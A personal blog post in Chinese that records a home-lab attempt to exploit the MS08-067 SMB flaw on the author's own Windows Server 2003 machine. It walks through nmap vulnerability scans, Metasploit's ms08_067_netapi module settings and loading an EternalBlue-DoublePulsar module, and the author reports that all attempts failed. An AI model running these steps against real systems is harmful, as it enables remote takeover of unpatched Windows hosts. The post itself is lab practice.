zoukankan      html  css  js  c++  java
  • MS08-067模拟入侵尝试

    对ms08-067漏洞的入侵测试

    先对自己的server2003当靶机,发现445端口,并且存在MS08_067漏洞

    原理:利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机

    nmap扫一把

    nmap   192.168.206.xxx
    

    发现了许多漏洞,先从445

    然后检验

     nmap --script=vuln  192.168.206.xxx  
    

    image-20210701184601545

    因为自己的win server 2003 不是英文版,然后这个漏洞不能成功,尝试了一下午。。。尝试了换payload、target的2003的英文,中文版本,后来还是错误。。。踏马块哭了

    但过程还得来一遍

    打开服务

    service postgresql start
    

    打开msfconsole

    然后搜索漏洞

    search ms07-067
    

    image-20210701214355990

    使用

    use exploit/windows/smb/ms08_067_netapi
    

    然后设置rhost,就是被攻击的445漏洞的ip

    set rhost 192.168.206.xxx
    

    查看可以攻击的靶机操作系统型号

    show targets
    

    image-20210701214756593

    设置参数

    set target 63

    show options 可以查看完整设置选项

    run

    进行攻击

    然后dos命令...可惜我见不到,23333

    尝试了86位的GitHub下的那个还是不行

    https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

    将Github下载来的eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中

    mv eternalblue_doublepulsar.rb  /usr/share/metasploit-framework/modules/exploits/windows/smb
    

    打开msf,然后reload_all

    use exploit/windows/smb/eternalblue_doublepulsar
    

    尝试安装wine

    apt-get install wine
    

    然后 打开多架构支持/安装wine32

    wine -h
    

    其他的一样

    甚至在最后更改进程

      set processinject explorer.exe
    

    但还是不行...版本问题,也可能是靶机问题,总之是自己技术不够的问题...23333

    别人都在不停的努力,自己又怎么会停
  • 相关阅读:
    SQL Server 2019 新版本
    SQL Server 中的窗口函数(2012 新函数)
    MySQL 学习(二)总体框架 & redo-log 和 bin-log 的介绍
    redis(四)集群(Sentinel)
    HahMap相关问题
    JVM工具使用和Linux-top命令解析
    缓存知识点
    消息队列(六)--- RocketMQ-消息消费
    redis(三)数据类型--位图相关
    分布式哈希一致性
  • 原文地址:https://www.cnblogs.com/chenyouxiu/p/14961319.html
Copyright © 2011-2022 走看看